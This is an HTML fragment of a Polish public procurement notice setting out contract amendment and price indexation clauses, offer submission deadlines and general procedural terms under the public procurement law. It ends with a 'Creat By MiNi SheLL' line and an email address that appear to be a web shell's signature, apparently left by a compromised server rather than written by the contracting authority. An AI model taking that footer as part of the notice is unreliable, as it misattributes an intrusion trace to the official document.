zawodowy oraz łączne kwalifikacje i doświadczenie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 22<br/>Zmiana Umowy<br/>1. Zmiana Umowy może nastąpić w każdym czasie, w sytuacjach przewidzianych w SWZ w postaci aneksu podpisanego<br/>przez Strony.<br/>2. Nieważność lub nieskuteczność któregokolwiek z postanowień Umowy nie powoduje nieważności lub nieskuteczności<br/>pozostałych jej postanowień.<br/>3. Zmiana niniejszych istotnych postanowień umowy może nastąpić, za zgodą obu Stron, wyrażoną na piśmie w formie<br/>aneksu do umowy pod rygorem nieważności w przypadkach określonych w art. 455 Ustawy Pzp, a w szczególności w<br/>następujących przypadkach:<br/>a) Zmiany polegające na dopuszczeniu udziału podwykonawców w sytuacji, gdy Wykonawca<br/>w treści oferty wskazano samodzielną realizację zamówienia.<br/>b) Zmiany przepisów ustawy o podatku od towarów i usług obowiązujących po dacie zawarcia umowy, wywołujących<br/>potrzebę zmian umowy wraz ze skutkami wprowadzenia takich zmian – w takim przypadku wartość netto wynagrodzenia<br/>Wykonawcy nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych<br/>przepisów,<br/>c) Zmiany osób wymienionych w ofercie przewidzianych do realizacji zamówienia w przypadku nieprzewidzianych sytuacji -<br/>nowe osoby muszą spełniać wymagania i posiadać kwalifikacje określone w specyfikacji dla osób, które będą uczestniczyć<br/>w wykonywaniu zamówienia, zmiana osób wymaga pisemnej zgody zamawiającego.<br/>§ 22 a. Klauzula waloryzacyjna<br/>1. Wprowadza się odpowiednie zmiany wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:<br/>1) stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>2) ceny materiałów lub kosztów związanych z realizacją zamówienia.<br/>2. Zasada i tryb wprowadzenia zmiany w przypadku określonym w ust. 1 pkt 1 to podpisany przez Strony aneks<br/>obowiązujący od daty rozpoczęcia obowiązywania aktu prawnego wprowadzającego zmianę, zaś w przypadku opisanym w<br/>ust. 1 pkt 2 zmiana wprowadzana będzie na wniosek Strony w terminie 30 dni w formie aneksu do umowy po<br/>udokumentowaniu, że zmiany, o których mowa w ust. 1 pkt 2 będą miały wpływ na koszty wykonania zamówienia przez<br/>wykonawcę o ten koszt, po wykazaniu przez Wykonawcę przy pomocy dokumentów wpływu zmiany wskazanych regulacji<br/>na koszty wykonania zamówienia i będzie wykazywała realny wpływ zmiany obciążeń publicznoprawnych na koszty<br/>wykonania zamówienia, a Wykonawca przy pomocy dokumentów i obliczeń wykaże koszty zmian, które w formie<br/>dokumentów zostaną załączone do umowy, w szczególności będą to kalkulacje kosztów pracy z oferty, w stosunku do<br/>kosztów pracy wynikających ze zmiany przepisów.<br/>3. Dopuszcza się waloryzację ceny na podstawie Komunikatu Prezesa Głównego Urzędu Statystycznego w sprawie<br/>średniorocznego wskaźnika cen towarów i usług konsumpcyjnych ogółem za dany rok, w okresach 6 miesięcznych<br/>(pierwsza waloryzacja po upływie 6 miesięcy wykonywania umowy).<br/>4. Zwaloryzowana cena stanowić będzie za każdym razem kolejny Aneks do Umowy.<br/>5. Maksymalna wartość zmiany wynagrodzenia, jaką dopuszcza zamawiający w efekcie zastosowania postanowień o<br/>zasadach wprowadzania zmian wysokości wynagrodzenia, nie przekroczy 10 % wartości pierwotnej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-20 14:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z załącznikami należy złożyć za pośrednictwem Platformy zakupowej pod adresem: https://goz-ornontowice.ezamawiajacy.pl/servlet/HomeServlet w zakładce „Oferty”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-20 15:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Rozliczenia pomiędzy Wykonawcą a Zamawiającym będą dokonywane w PLN.<br/>2. W sprawach nie uregulowanych niniejszą SWZ mają zastosowanie przepisy ustawy – Prawo zamówień publicznych oraz<br/>Kodeksu cywilnego.<br/>3. Oferty, opinie, oświadczenia, zawiadomienia, wnioski, inne dokumenty i informacje składane przez Zamawiającego i<br/>Wykonawców oraz umowa w sprawie zamówienia publicznego stanowią załączniki do protokołu postępowania.<br/>4. Protokół wraz z załącznikami jest jawny. Załączniki do protokołu udostępnia się po dokonaniu wyboru najkorzystniejszej<br/>oferty lub unieważnieniu postępowania. Protokół postępowania lub załączniki do protokołu postępowania udostępnia się w<br/>oryginale lub kopii. Udostępnianie protokołu postępowania lub załączników do protokołu postępowania następuje przy<br/>użyciu środków komunikacji elektronicznej, na wniosek zainteresowanego.<br/>5. Oferty są jawne od chwili ich otwarcia.<br/>6. Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej<br/>konkurencji, jeżeli Wykonawca zastrzegł w ofercie, że nie mogą one być udostępniane.<br/>7. Zamawiający nie ogranicza:<br/>możliwości ubiegania się o zamówienie publiczne tylko dla Wykonawców, u których ponad 50% pracowników stanowią<br/>osoby niepełnosprawne.<br/>8. Zamawiający nie zamierza:<br/>1. zawierać umowy ramowej,<br/>2. ustanawiać dynamicznego systemu zakupów,<br/>3. zastosować aukcji elektronicznej przy wyborze najkorzystniejszej oferty.<br/>9. Zamawiający nie przewiduje:<br/>1. rozliczeń w walutach obcych,<br/>2. komunikowania się Zamawiającego z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej,<br/>3. zwrotu kosztów udziału w postępowaniu,<br/>4. możliwości udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp,<br/>5. zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy Pzp,<br/>6. zatrudnienia osób, o których mowa w art. 96 ust. 2 pkt 2 ustawy Pzp,<br/>7. zastrzeżenia możliwości ubiegania się o udzielenie zamówienia wyłącznie przez Wykonawców, o których mowa w art. 94<br/>ustawy Pzp,<br/>8. przeprowadzenia przez Wykonawcę wizji lokalnej (...) art. 281 ust 2 pkt 12 ustawy Pzp,<br/>9. obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań o których mowa w art. 60 oraz art. 121 ustawy<br/>Pzp,<br/>10. złożenia ofert w postaci katalogów elektronicznych,<br/>11. udzielenia zaliczek na poczet wykonania zamówienia.<br/>10. Zamawiający zastrzega sobie prawo do:<br/>1. zmiany treści ogłoszenia o zamówieniu opublikowanego w Biuletynie Zamówień Publicznych, o której mowa w art. 271<br/>ust. 1 ustawy Pzp,<br/>2. w przypadku dokonania zmiany w ogłoszeniu, Zamawiający, o ile zajdzie taka konieczność, przedłuży termin składania<br/>ofert o czas niezbędny do wprowadzenia zmian w ofertach,<br/>3. zmiany treści specyfikacji warunków zamówienia z zachowaniem wymogów o których mowa w art. 286 ustawy Pzp,<br/>4. unieważnienia postępowania o udzielenie zamówienia na podstawie art. 310 ustawy Pzp, jeżeli środki, które Zamawiający<br/>zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostaną mu przyznane lub umowa o<br/>dofinansowanie ulegnie zmianie.

Creat By MiNi SheLL
Email: jattceo@gmail.com